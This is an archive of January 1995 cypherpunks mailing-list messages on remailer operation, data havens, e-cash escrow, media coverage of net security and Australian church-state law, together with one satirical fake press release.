From: John Young <jya@pipeline.com>
Date: Mon, 23 Jan 95 13:20:12 PST
To: cypherpunks@toad.com
Subject: CIAC Advisory on Net Threat
Message-ID: <199501232119.QAA00861@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


CIAC has issued its Advisory Notice F-08, dated today, 11:00 PST, on the
Net security threat described by Markoff, titled: 
 
     Internet Address Spoofing and Hijacked Session Attacks 
 
 
For those not subscribed to CIAC who want a copy: 
 
Send blank message with subject:  CIAC_f08 
 
 
 
Anybody want to force me to post it to the list?  It's about 12K, including
subscription info for CIAC.  I really hate fire.  Silencio is gelt.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 23 Jan 95 13:51:11 PST
To: cypherpunks@toad.com
Subject: Re: bruce s(t)erlings talk
Message-ID: <v01510101ab4991b8c83e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>>can you get me a copy of bruce serlings talk given to law enforcement
                                 ^^^^^^^^
Uh, yes, well... I wonder if he's related to Rod...

S>T<erling, yes?

Post 'em first, and lot God sort them out...
Bob



-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 23 Jan 95 14:01:25 PST
To: cypherpunks@toad.com
Subject: Ben Goren Eyes Only
Message-ID: <199501232200.RAA06564@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995 Ben Goren <ben@Music.ASU.Edu> said: 
 
 
Mr. Goren, 
 
Mail to <ben@Music.ASU.Edu> ricochets.  Hep.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Sun, 22 Jan 95 22:08:28 PST
To: cypherpunks@toad.com
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <Pine.3.89.9501221445.A8848-0100000@netcom10>
Message-ID: <Pine.SUN.3.91.950123170842.21383B-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Jan 1995, James A. Donald wrote:

> Both Australia and England have government established
> religions, so I expect there was a major turn out from
> those two nations.

An extract from the Australian Constitution:

116. The Commonwealth shall not make any law for establishing any
religion, or for imposing any religious observance, or for prohibiting the
free exercise of any religion, and no religious test shall be required as
a qualification for any office or public trust under the Commonwealth. 

Do please explain.

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Mon, 23 Jan 95 16:23:48 PST
To: cypherpunks@toad.com
Subject: US News and World Report
Message-ID: <Pine.3.89.9501231854.D27436-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
I just looked over an article in US News and World Report today.  The cover
was a badge with the words "Cyber Cops" on it.  Guess which article I
scanned.
 
"Is Anything Safe in Cyberspace?"
 
I think it came over okay.  Quoted Chaum, mentioned the positive uses of
remailers, had an extensive sections on privacy and on free speech.  It
was somewhat sympathetic to Clipper, didn't really take the protests
seriously.  Mentioned anonymous ecash.  It also had a quote skewering the
highway metiphore, "It's organic".
 
This was all after the four horsemen were trotted out, in all their glory.
If anyone looked at only the first six inches, it sounded like an attack on
the net as a whole.
 
I'ld give it a 4 on an objective scale, 7 compared to what we expect.
 
 
Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.
 
Factors for modulous are not proven primes.  Key may be far weaker than
expected.  Encode your own risk.
 
Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.coKey fingerprint 
=  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLyRiMHmgMs8UcStNAQE0jQf+PoZWpuN5y8mDfpvn7g1eiJs6uHI+7DqM
lS63jgQs5zE4Nfk7yXCyhh9HY7qx8T2P4TvRUBGFGZk74+9ANg54GopBDLWYEwFM
eNgheMg1w/iF6kyrEyPBLS3QaphfjDgknf6ohBv6qx/ZOJ7N10iWW06eu5O/H9Se
YDk6RvUzz7niyknGG1kO3aTqTqQ3tSG21FRktV7gbUeayLCLdhQKD7bowZkClR6Z
KJ2gVvu7dmNczpsMYleZjOD2p9rSsMKoL42rJykbJRwHunJhF8hgaUnq8P7frmea
xJ8YlcrrI+rwY5mNb6ylNR/KLNvV+rd17IZjE/+3xaPEM+s04dy1Rw==
=WAub
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Mon, 23 Jan 95 15:39:10 PST
To: cypherpunks@toad.com (Cypher Punks)
Subject: Re: The Remailer Crisis
In-Reply-To: <9501232220.AA18684@anchor.ho.att.com>
Message-ID: <9501232335.AA28911@marlin.ssnet.com>
MIME-Version: 1.0
Content-Type: text


Okay, I'm willing to start a remailer.  I'll have a new account on a
different machine within a few days and I'll do it there.

Anyone want to volunteer for a little hand holding while I get it
started?
-- 
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jRT <jrt@asiaonline.net>
Date: Mon, 23 Jan 95 02:42:35 PST
To: Michael Handler <grendel@netaxs.com>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Pine.SUN.3.91.950122232148.24135H-100000@unix3.netaxs.com>
Message-ID: <Pine.SUN.3.91.950123184039.4882B-100000@asiaonline.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 22 Jan 1995, Michael Handler wrote:
> On Wed, 18 Jan 1995, Jonathan Cooper wrote:
> 
> > > 	I could write a procmail recipe and a script in about an hour to
> > > automatically secret-share-split and redistribute the incoming submission.
> > 
> >    How would you handle retrieval of the data?  
> 
> 	Details, details. Just off the top of my head: an encrypted 
> database that logs where the pieces were split and sent to. When the 

I'd prefer to see a redunancy system here whereby the pieces each contain 
a cypher strip of info on the location of the others (not the entire 
location listing, that would be too insecure)
Maybe a few locations to store the loations of the segments.

just a thought.

------------------------------------------------------------------------------
  Computers   Communications   Reduced Rate IDD Service   Innovative Widgets
-Tel-(+852)-2334-8850-----------=j=R=T=----------------Fax-(+852)-2334-3042-

 Help protect the environment -- This message is made from recycled electrons
------------------------------------------------------------------------------
           Asia On-Line - Asia's Cheapest Internet Access Provider
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 23 Jan 95 19:00:48 PST
To: cypherpunks@toad.com
Subject: BlackNet as a Data Haven/Vault
In-Reply-To: <9501232223.AA18759@anchor.ho.att.com>
Message-ID: <199501240259.SAA03279@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


wcs@anchor.ho.att.com wrote:
> 
> Tim and Eric write things like:
> > I fully concur.  The connotations of the word "haven" imply activities
> > that ordinary people don't see themselves doing.  This means that
> > ordinary people won't generally use something called a "haven", even
> > if they might use exactly the same service called something else.
> 
> We can always call them "Private Storage Servers" or some such;
> an interesting question is whether the main uses will be
> for retrieval by the storer, or by someone else, or by a bunch of others,
> and how we describe the service may affect that.

To coin a phrase, I fully concur. A taxonomy of services like this is
needed.

I was talking to some recently about dat havens/vaults/U-STOR-ITs, and
it was once again clear that our language is imprecise. Also, that who
the probably customers are, and how much they'll be willing to pay, is
unclear.

The "U-STOR-IT" model, similar to train lockers, safe deposit boxes,
storage lockers, etc., is fairly well protected, legally and socially.
Even though illegal things are often stored in such places, they
haven't been banned. (And last time I was in Europe, train lockers
were ubiquitously used, even in these terrorist times.)

But make the storgage locker accessible to many people, and watch what
happens. (I can't recall a good case on this, but I'm sure such "dead
drops" would not go unscathed.)

For example, the U-STOR-IT model applied to data is already common:
remote backups, courier services that pick up DAT backups everyday,
etc.

But announce a site is for the anonymous storage and retrieval of
files, a la storing commerical software, and watch for fireworks! (The
recent outcome in the LaMacchia case notwithstanding....)

Of course placing such sites outside the U.S. is one approach. Placing
them at the end--or somewhere-- of a chain of remailers is another
approach. The message pool approach used for BlackNet says that the
site need not even be traceable: just encrypt once or twice (once to
keep the contents secret, another to encrypt to BlackNet's public key)
and put it into a message pool or other publically readable place.
Then BlackNet grabs it, untraceably, and decrypts it, extracts its
digital money storage fee, and holds the file. When a suitably-signed
"storage receipt" is posted publically, BlackNet encrypts the file to
the public key provided, and posts the file.

Simple, eh? (Newcomers are likely to ask at this point: "But what's to
keep BlackNet from cashing the digital money and then not sending the
file out?" First, the encrypted data is of no use to BN, so the
marginal value to them is nil. Second, potential customers will likely
test the service with dummy files, etc. Third, reputations do matter.)

But of course the taxonomy needs to be done by anybody seriously
planning such a thing, and careful analysis of weaknesses and attacks
should be done.

(By the way, I've been remiss in not congratulating relative newcomer to
the list, Wei Dai, for his insightful work on traffic analysis of
remailers. It's the kind of work Hal Finney and Matt Blaze, and
others, have long been doing, and I find it very encouraging. I'm not
trying to sound judgmental here, just saying some of us appreciate
this kind of detailed analysis. Much more is needed.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 23 Jan 95 20:01:32 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <9501232220.AA18684@anchor.ho.att.com>
Message-ID: <199501240400.UAA20706@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: wcs@anchor.ho.att.com

   Tim writes:
   > One thing I should've noted is that a Linux-based cheap remailer is
   > mostly useless without a "live connection" to the Net. 

   I disagree - live connections  are great for fast-response systems,
   but we got along just fine in the uucp dialup world with occasional
   connections; 

And if get someone to do secondary MX for you that _is_ fulltime
connected, then the only latency for mail is the poll time.  If you're
on an ISDN line, for example, you can get online and poll every five
minutes for ten seconds at a time (ten seconds only when there's no
mail), cutting down line charges for fulltime _idle_ connectivity by a
factor of thirty.  Not all that expensive at all, really.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@chewy.wookie.net>
Date: Mon, 23 Jan 95 18:31:26 PST
Subject: Re: US News and World Report
In-Reply-To: <Pine.3.89.9501231854.D27436-0100000@vern.bga.com>
Message-ID: <Pine.3.89.9501232123.A21892-0100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Jan 1995, Nathan Zook wrote:

> This was all after the four horsemen were trotted out, in all their glory.
> If anyone looked at only the first six inches, it sounded like an attack on
> the net as a whole.
>  
> I'ld give it a 4 on an objective scale, 7 compared to what we expect.

I just read this piece the other day. Had people from FLETC talking about 
people being "victimized by information" and included lines that 
doublespeaked supporting freedom of speech while asking what types of 
speech should be made illegal, making these two contradictory ideas seem 
perfectly compatible and natural.

- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Mon, 23 Jan 95 18:55:27 PST
To: Remailer-Operators@c2.org
Subject: Re: jpunix.com and MX'ing
In-Reply-To: <199501231457.GAA16462@largo.remailer.net>
Message-ID: <m0rWbPO-000yxSC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


eric@remailer.net (Eric Hughes) wrote:

>    From: "John A. Perry" <perry@jpunix.com>
> 
>    > A question, from an internet mail novice:  How does the 'invisible'
>    > remailer advertise itself as its 'visible' name in it's outgoing
>    > mail?  
> 
> Perhaps the easiest thing to do is to add a Received: field to all
> outgoing remailed mail so that it appears that the visible site is
> handling the invisible site as if it were UUCP or a firewall or
> mailhub or something.  Since anybody who really wants find out who
> actually owns the machine is going to, you might as well indicate the
> real relation up front, namely, that the owner of the visible machine
> routs mail for the invisible one.  In other words, there would be two
> Received: fields in outgoing remailed mail.  The first (lower, later
> in the stream) Received: field would be generated by the remailer
> software.  The second would be added by the system sendmail.
> It will be tricky to make this look just right.

This doesn't really sound too difficult.  Just have a script run as
user uucp which adds the header and hands the message to sendmail.

> Another way to mask this is to give the remailer its own IP address.
> It's easy to recompile extra slip interfaces into a kernel; each gets
> its own IP address.  Routing the output of the remailer through these
> extra interfaces can require some hackery, though.  I only know about
> this second hand, but evidently the BSDI 1.1 release added some BSD
> 4.4 feature that makes this kind of IP hack much easier.  

Yes, this can be done, but getting IP addresses isn't easy for most
people.  I would propose that we use the unassigned IP address blocks
which are reserved for private networks (see RFC 1597).  In fact,
we could even connect the remailer systems that use the private address
space via IP tunneling (swIPe maybe?  or SLIP over telnet?)  These
remailer hosts could then communicate with each other on a private
network, and gateway mail to the internet via "firewall" hosts.  This
approach would also allow us to connect private machines to the
remailer network by providing IP connectivity to hosts which currently
use software such as Term or TIA.  Having more remailers on private
machines would be a good thing IMHO.  Finally, such a network might
serve as a basis for building future untracable/anonymous IP routing
capability.

> What we're creating here, of course, is virtual machines.  Unix
> kernels have supported multiple processes and multiple users for a
> long time.  I expect multiple virtual machines this decade.

I wonder if the "Term" program could be modified to act as a virtual
machine?  For those not familiar with the program, it creates a unix
domain socket and supplies IP services via it, forwarding them over
a modem connection.  Many programs have been modified to work with
it.  Perhaps term could be modified to send its output to an IP
interface instead.  Each user on the system can run his own term
process and have his own virtual machine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 23 Jan 95 22:23:44 PST
To: slowdog@chewy.wookie.net (slowdog)
Subject: Doublespeak, Doublethink, Thought Police, and 1984
In-Reply-To: <Pine.3.89.9501232123.A21892-0100000@chewy.wookie.net>
Message-ID: <199501240622.WAA26904@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


slowdog wrote:

> I just read this piece the other day. Had people from FLETC talking about 
> people being "victimized by information" and included lines that 
> doublespeaked supporting freedom of speech while asking what types of 
  ^^^^^^^^^^^^^
> speech should be made illegal, making these two contradictory ideas seem 
> perfectly compatible and natural.

Slowdog is exactly right! This whole debate we're seeing is a perfect
example of "doublethink," in which two opposing ideas are held in
one's head at the same time, eventually eroding all principles
(so that if four fingers are held up, but the State says "five," then
it really _is_ five fingers being held up).

I first read "1984" in around 1966, when I was in the 8th grade, and
it has stuck with me ever since. No other novel has added as many
basic linguistic and political ideas to the language as this novel--by
yet another member of the Eric Conspiracy Secret Laboratories!

Big Brother, Thought Police, thoughtcrime, doublespeak, doublethink,
Big Brother is Watching You!, War is Peace, Freedom is Slavery,
sexcrime, unperson, and probably several other terms I've left
out. All are part of our language.

Too bad people on both the left and the right are missing the lesson.

Any Cypherpunk who hasn't read this novel should run out tonight to
the All-Nite Barnes and Borders Megastore and buy a copy.


--Tim May, Citizen-Unit 227-80-5894

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 23 Jan 95 22:32:46 PST
To: Dave Horsfall <dave@esi.COM.AU>
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <Pine.SUN.3.91.950124104650.28961G-100000@eram.esi.com.au>
Message-ID: <Pine.3.89.9501232257.A13814-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, Dave Horsfall wrote:

> Date: Tue, 24 Jan 1995 10:56:06 +1100 (EST)
> You might be amused to know that our Governor-General (the "Queen's Man")
> is himself an avowed atheist - is it likely he would have been appointed
> by a pro-religious government?

Establishing a religion is usually an act of hostility towards religion,
not an act of support

He who pays controls.

Recollect how the Church of England originally came to be established?

The King put the church on his payroll, after confiscating its 
independent sources of revenue.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: plaz@netcom.com (Plaz)
Date: Mon, 23 Jan 95 22:44:59 PST
To: cypherpunks@toad.com
Subject: UN passes Information Super-Highway Beautification Resolution
Message-ID: <v02110100ab49d6aa5898@[192.187.134.54]>
MIME-Version: 1.0
Content-Type: text/plain


In regards to Tim's Internetpol comment:

I wrote this back in april:
________________________________________________________________________________
Headline: Emergency Beautification of the InfoBahn

UN Press Conference, April 8, 1996

UN Spokesperson Lance Rotweiler announced today that the "Information
Super-Highway Beautification Resolution" had been passed in an Emergency
Session of the UN Security Council. The resolution sets decency standards
for electronic communications and grants broad powers to Interpol for
enforcement of these standards.

"There's a new sheriff in town," Rotweiler said. "It's time for
child-pornographers, perverts and cryptoanarchists to get off the net. For
too long, we have been allowing these sodomists to creep into our living
rooms and seduce our children through the information highway. It's time to
clean up."

The resolution also calls for a ban on non-escrowed cryptography for
personal communications and anonymous communications, which Rotweiler says
is often used to conceal criminal and immoral activity.

"Enforcement of the resolution has already begun," Rotweiler stated. "In
Canada this morning, a warrant was issued for the arrest of a hacker who
has blocked the removal of various usenet groups that advocate illegal and
immoral activities, such as alt.sex.bestiality and alt.sex.bondage. We do
regret that the individual chose to resist arrest and was shot under the
mistaken assumption that he was armed, but as you know these groups were
available to the average nine year old with a remote. You mess with our
kids, and you deserve what you get."

[Editors Note: The hacker, Brian Lee of Toronto Canada, was brandishing a
mini-vac commonly used for cleaning computer keyboards, while shouting
obscenities. The arresting officers mistook this appliance for a pistol and
opened fire. Brian Lee is survived by a wife and 2.5 children. See related
story "Pornography Accomplice Dies in Shoot-out"]

"New operations are planned for the newly created branch of Interpol, which
we are calling 'InfoPol'," Rotwieler continued.

When asked whether the 'InfoPol' had world-wide jurisdiction, Rotweiler
responded, "Yes, but certain holdouts in the community of nations are
refusing to accept this. Most notably, Bolivia, Belize and Western Samoa,
nations which make their stock and trade dealing with the criminal element.
We expect these nations to come around, as the resolution calls for
economic sanctions against those countries that refuse to cooperate in this
great venture."

End Note: When stepping away from the podium, Rotweiler was heard to
mumble, "This ought to get her tentacles in a knot." When asked to explain
this comment the UN spokeperson declared the press conference to be at an
end.

________________________________________________________________________________
Geoff Dale        |           Mail me ->                  mailto:plaz@netcom.com
AnarchyPPL Anarch |          Visit me ->                http://io.com/user/plaz/
Plastic Beethoven |           Hire me ->        http://io.com/user/plaz/rez.html
plaz@netcom.com   |AnarchyPPL Charter -> http://io.com/user/plaz/AnarchyPPL.html
________________________________________________________________________________
                      Do have nasty meme infestations?
                     Well then, you need new Meme-Away!
              The most effective memicide spray on the market.
                          *Now with extra CFCs*






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 24 Jan 95 01:20:53 PST
To: jya@pipeline.com (John Young)
Subject: Re: CIAC Advisory on Net Threat
In-Reply-To: <199501232119.QAA00861@pipe1.pipeline.com>
Message-ID: <199501240919.BAA28173@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> CIAC has issued its Advisory Notice F-08, dated today, 11:00 PST, on the
> Net security threat described by Markoff, titled: 
>      Internet Address Spoofing and Hijacked Session Attacks 
> For those not subscribed to CIAC who want a copy: 
> Send blank message with subject:  CIAC_f08 
>  
    Or just download directly from CIAC at:

 ciac.llnl.gov:/pub/ciac/bulletin/f-fy95/f-08.ciac-IP-spoofing-hijacked-sessions-attacks 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Tue, 24 Jan 95 03:26:09 PST
To: cypherpunks@toad.com
Subject: DOJ Computer Seizure Guidelines
Message-ID: <199501241124.DAA24739@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    Seen on comp.society.privacy.  This document was obtained
    by an FOIA suit by EPIC. I ftp'd from the cpsr.org but even
    at 2:30 a.m. PST the 315 Kbytes took an excruciating 481 seconds.

    For those on netcom its on /ftp/pub/ba/bart easily available,
    if others can get through to ftp.netcom.com at least the
    transfer might be faster than cpsr.

    Encrypted information is dealt with on pps 54-55 in particular.
    I'll leave conclusions to our lawyerly types.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 24 Jan 95 02:04:22 PST
To: cypherpunks@toad.com
Subject: CNN on "New threat to the net."
Message-ID: <Pine.SV4.3.91.950124035704.22567A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


I just had CNN on for background noise. They did a one minute piece on a 
new threat to the internet. HACKERS. Bizdos for some reason was on it and 
they went slightly into why transmitting credit card numbers as plain 
text was stupid. Their estimate is that encryption is at least five years 
away. Just amazing... BTW- they recommended that everyone install routers 
to hinder hackers. Check it out...it was on headline news so it probably 
will be repeated every half hour.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Tue, 24 Jan 95 04:26:42 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: The Remailer Crisis
In-Reply-To: <199501240400.UAA20706@largo.remailer.net>
Message-ID: <199501241215.GAA00443@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> And if get someone to do secondary MX for you that _is_ fulltime
> connected, then the only latency for mail is the poll time.  If you're
> on an ISDN line, for example, you can get online and poll every five
> minutes for ten seconds at a time (ten seconds only when there's no
> mail), cutting down line charges for fulltime _idle_ connectivity by a
> factor of thirty.  Not all that expensive at all, really.
> 
> Eric
>
Exactly how does this work at your location Eric? Here in Southwestern Bell
we don't use the D except for call initiation and termination. There is no
useage tarriff other than this. Hence, we have no idle charge. My bill runs
a flat $72 and some change each month.

Take care.

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.techwood.org>
Date: Tue, 24 Jan 95 06:29:28 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: New anonymous remailer.
Message-ID: <199501241428.GAA00363@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text



Ok, I'm happy to announce a new anonymous remailer, the Tower Anonymous
Remailer, at remailer@tower.techwood.org

Standard cpunks remailer, installed from the remailer installation
script 1.01 from ftp.csua.berkeley.edu, supporting pgp.

Here's the server's public key, which I have submitted to 
io.com:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBNAy8iqAQAAAECALHjiFPr7Is0NptniDkYJ9UnRFM3Pn9Lz7mrPd58uo/EPMF5
bm3TjfAmdMlw2oBTtm7Ch3dsfBY44XEEwzVRkb0ABRG0NlRvd2VyIEFub255bW91
cyBSZW1haWxlciA8cmVtYWlsZXJAdG93ZXIudGVjaHdvb2Qub3JnPg==
=Rfb5
-----END PGP PUBLIC KEY BLOCK-----

Response times should be good.  (Note that my network's connection
to the backbone is being changed in the next few days, and this may
affect things in the meantime.)

Anyplace else I should submit the key for maximal exposure?  

How might I go about being added to the "ping list" ?

--
Craig Johnston
caj@tower.techwood.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Tue, 24 Jan 95 03:49:05 PST
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Pseudo-anon Ecash with GAK -- Sandia Proposal
Message-ID: <199501241150.GAA01617@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


While browsing through the program for the 6th annual ACM-SIAM SODA
(http://www.netlib.org/confdb/soda95/prog.html), which concludes today in SF,
I noticed the following scheduled for this morning:

8:55 
   Trustee-based Tracing Extensions to Anonymous Cash and the Making of
   Anonymous Change 
   Ernie Brickell, Peter Gemmell and David Kravitz, Sandia National
   Laboratories, Albuquerque 

I haven't been able to find a pointer to an actual paper, but I did find an
abstract of sorts at http://www.cs.sandia.gov/HPCCIT/el_cash.html. Their
proposal purports to elaborate the notion of GAK ("key escrow") to cover
an otherwise-anonymous ecash system, according to my reading of this.
Caveat emptor.

Here's an extended excerpt of the doublespeech:

"We introduce the first electronic cash system that incorporates trustee-based
tracing, while provably protecting user anonymity. This effort expands on
provably anonymous electronic cash systems. Our system maintains completely
provable user anonymity with the exception that, only with the cooperation of
several publicly appointed trustees (e.g. key-escrow agents), the government 
can trace a user's spending with certainty, determining to whom the user gave
his/her money and how much s/he gave. The trustees can answer the question of
whether a particular payment was made by a particular user, without revealing
any additional information. This allows for authorized forward and backward
tracing that does not impinge on the privacy of anyone other than the parties 
of the one transaction in question. Some of our trustee-based tracing require 
no tamper-resistant hardware, and all can be implemented as either on-line or
off-line systems."

Electronic cash is a subject of great economic, political, and research
importance. With advances in computer networks, in processor speed, and in
databases, and with advances in note counterfeiting technology and with both
individuals' and businesses' desire for remote and more convenient financial
transactions, some forms of electronic cash are likely to become widespread
within 5 to 10 years. Although unconditionally anonymous electronic cash 
systems have been proposed in the literature, governmental and financial 
institutions are unwilling to back a completely anonymous system. Their 
reasons for opposing complete untraceability have to do with the containment 
of user fraud and the desire to restrict the new kinds of crime that 
unrestricted, remotely withdrawable, and spendable electronic cash could 
facilitate. Because of the necessary concern over crime control, they have 
previously proposed systems with little or no protection for the users' 
privacy. Our system provides the capability required by government for crime 
control while maintaining privacy for all other users."

 -L. Futplex McCarthy; PGP key by finger or server; I'm seeking an internship/
  job for summer 1995 --- BS CS Cornell / 2 yrs. MS-level work in algebraic
  algorithms, Ph.D. planned --- send private email for resume etc.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Tue, 24 Jan 95 07:02:02 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
In-Reply-To: <199501241215.GAA00443@einstein.ssz.com>
Message-ID: <199501241501.HAA21364@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: root <root@einstein.ssz.com>

   Exactly how does this work at your location Eric? Here in Southwestern Bell
   we don't use the D except for call initiation and termination. There is no
   useage tarriff other than this. 

The standard residential tariff here in Pac Bell is flat rate duing
non-business hours and per-minute during them.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Mon, 23 Jan 95 14:10:47 PST
To: cypherpunks@toad.com
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <Pine.3.89.9501222311.A9801-0100000@netcom19>
Message-ID: <9501240859.ZM18615@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 23, 12:06am, James A. Donald wrote:
> Church of England in Australia was, and I believe still is, government
> funded by the Australian government.

Please substantiate.  I am aware of no government funding to the
Anglican Church in Australia.

> Furthermore when my kids went to government school in NSW, Australia,
> they were taught Church of England religion by my neighbor, Mrs Law,
> in school, in the classroom.

When I went to school (government school) the religion taught depended on
exactly who they could get to teach it.  If they could get COE, they got
COE.  If they could get Catholic, they got Catholic.  If they couldn't,
the rest of the kids got shoved into whichever group seemed most
appropriate, or allowed not to attend scripture at all.  This led to
some interesting mixes, and some interesting people to teach it
(my favorite was a guy who had been in the Belgian Resistance during
WWII, and had been war-wounded by a German soldier.  It took us the
whole term to get it out of him that he'd been shot in the butt.)

I'd also point out the funding to private religious schools does not
discriminate on the basis of religion.  Hardly indicative of a state
religion, surely.

> If it quacks like a duck ...

And if it doesn't, it's not a duck.

> I suspect that the government and the church are none to clear on it
> either.

Hmmm... try as I might, I cannot think of a recent decision which
received any specific denominational influence.  Even the Festival of
Light is becoming a political irrelevancy.

							Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Tue, 24 Jan 95 09:11:29 PST
To: cypherpunks@toad.com
Subject: Here's what will happen to U.S. based remailers
Message-ID: <199501241711.JAA01094@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


I just got a call.  Supposedly Clinton just pulled an executive order
out of his navel last night, confiscating the assets of 12 "terrorist 
groups" and 18 disfavored people.  CNN is reporting a few of the names, 
but not all.  The ones they mention are associated with groups like 
"Islamic Jihad".  These groups are hard to defend, but if he can do it 
to them today, he can do it to you tomorrow.

My old German acquaintance says that Hitler used to do this, issuing
midnight decrees to seize property, make new prohibitions, etc.

I assume that the Republican congress approves of what Bill is doing,
or they would be impeaching him.  After November 8, I thought we had
a couple of years of breathing room.  Now, I'm not so sure.








